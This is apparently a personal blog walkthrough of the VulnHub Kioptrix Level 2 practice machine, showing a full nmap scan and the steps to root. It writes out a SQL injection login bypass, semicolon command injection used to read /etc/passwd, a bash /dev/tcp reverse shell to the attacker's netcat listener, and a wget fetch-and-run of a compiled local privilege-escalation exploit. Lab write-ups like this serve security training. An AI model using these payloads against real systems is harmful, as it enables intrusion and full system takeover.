WalkThrough! Kioptrix — 2 By VulnHub

Kamran Saifullah
7 min readMar 12, 2018

--

Hi,

Like my previous WalkThrough which was on the Kioptrix Level 1. This is going to be on Kioptrix Level 2 machine. This machine is also easy to exploit. It’s very straight forward and so does the exploitation phases. So let’s move on.

Kioptrix-2 Machine can be found on the below link;

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

The way of mounting is the same like the way other machines has to be mounted.

As always the first step is to find the ip address of the Kioptrix-2 machine. So the command is going to be same always i.e;

netdiscover -i eth0

Once i’ve got the IP address of the Kioptrix-2 machine the next step is Port Scanning. So the command for that was;

root@w4tchd0g:~# nmap -Pn -T4 -A -v 192.168.97.135

Starting Nmap 7.60 ( https://nmap.org ) at 2018–03–12 10:01 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:01
Completed NSE at 10:01, 0.00s elapsed
Initiating NSE at 10:01
Completed NSE at 10:01, 0.00s elapsed
Initiating ARP Ping Scan at 10:01
Scanning 192.168.97.135 [1 port]
Completed ARP Ping Scan at 10:01, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:01
Completed Parallel DNS resolution of 1 host. at 10:01, 0.40s elapsed
Initiating SYN Stealth Scan at 10:01
Scanning 192.168.97.135 [1000 ports]
Discovered open port 80/tcp on 192.168.97.135
Discovered open port 443/tcp on 192.168.97.135
Discovered open port 3306/tcp on 192.168.97.135
Discovered open port 22/tcp on 192.168.97.135
Discovered open port 111/tcp on 192.168.97.135
Discovered open port 631/tcp on 192.168.97.135
Discovered open port 777/tcp on 192.168.97.135
Completed SYN Stealth Scan at 10:01, 0.22s elapsed (1000 total ports)
Initiating Service scan at 10:01
Scanning 7 services on 192.168.97.135
Completed Service scan at 10:02, 12.26s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.97.135
NSE: Script scanning 192.168.97.135.
Initiating NSE at 10:02
Completed NSE at 10:02, 2.21s elapsed
Initiating NSE at 10:02
Completed NSE at 10:02, 0.01s elapsed
Nmap scan report for 192.168.97.135
Host is up (0.00085s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 774/udp status
|_ 100024 1 777/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName= —
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName= —
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009–10–08T00:10:47
| Not valid after: 2010–10–08T00:10:47
| MD5: 01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2018–03–11T17:01:02+00:00; -21h01m11s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
777/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:54:51:FD (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9–2.6.30
Uptime guess: 0.144 days (since Mon Mar 12 06:34:44 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: mean: -21h01m11s, deviation: 0s, median: -21h01m11s

TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 192.168.97.135

NSE: Script Post-scanning.
Initiating NSE at 10:02
Completed NSE at 10:02, 0.00s elapsed
Initiating NSE at 10:02
Completed NSE at 10:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.366KB)

Once i had the port scan and I’ve found that port 80 & port 443 are up, i quickly knew it’s a web server and any sort of pages should be there when the IP address is going to be opened via browser. So i quickly opened the browser and surfed the IP address and found a Login Page right up there.

As i found that login panel is up. I though of trying the default credentials i.e “admin:admin”, “root:toor”, “admin:admin123”, “ : “ and so on. But none of these credentials worked. So i though of bypassing this login panel and tried (‘or’1'=’1) as username and password and boom i was inside the admin panel.

The text said that “Ping a Machine on the Network” means we can run some commands. I tried entering text and it was reflected on the page like;

So i thought of trying eliminator “;” i.e semicolon to look how the server/web responses and found that it wan’t being returned as a text means it’s being executed so i was sure from here that “Command Injection” is right up there. Before this i tried testing “ls -la” command and it was being redirected. But terminator was the one who helped executing the commands. Then i again ran “ls -la” command followed by the terminator and boom what it worked..

Ohkay, so now let’s try to grab the ‘/etc/passwd’.

Fine now. Similarly we can run all the commands to grab information. From here onward i was thinking how are we going to get the reverse shell. I knew about “NetCat” before and it’s one of the best tools so far i’ve ever used. So i quickly googled to get an overview of the commands and the details and found these websites useful;

https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

So now my target was to send the reverse connection from the site and set “NetCat” in listening mood at my machine. So the command to set netcat to listening mode was;

nc -nlvp 443

The command to set reverse connection was;

bash -i >& /dev/tcp/<attackers’ IP/port:443 0>&1

After this the NetCat showed that we have got the reverse connection.

I quickly ran ‘ls’ command and found 2 php files.

  1. index.php
  2. pingit.php

On looking into the index.html file i found usernames and password for My-Sql server. Means, we can log into My-Sql server using those credentials.

But the issue was to get root access and obviously we will have to look for the particular exploit so i checked for the OS Details;

lsb_release -a

So from here i got the details about the Operating System and the machine was running on CentOS version 4.5. After this i quickly googled for CentOS 4.5 exploits on Exploit-DB and found one result.

So my next step was to download this exploit on the machine. On trying wget command it showed me an error.

Even after using ‘ — no-check-certificate’ the file wasn’t downloading. So i got an idea to host the exploit on my apache server, on my machine and from target machine i can download it and can execute it. So the commands were;

root@w4tchd0g:~/Desktop#gcc -o toRun 9542.c

root@w4tchd0g:~/Desktop#cp toRun /var/www/html

root@w4tchd0g:~/Desktop#service apache2 start

Now on target’s system. It was quite simple.

bash-3.00$ wget http://myMachineIp/toRun

Once downloaded giving it the “Read, Write & Execute” permissions

bash-3.00$ chmod 755 toRun

bash-3.00$ ./toRun

Boom the b0x has been successfully exploited and we have gained the root privileges.

--

--

Kamran Saifullah
Kamran Saifullah

Written by Kamran Saifullah

Malware/RE/Firmware Analysis, App Sec/Off Sec, VAPT, Phishing Simulations/SE | Risk Management, IS Governance, Audits, ISO 27001 LI

No responses yet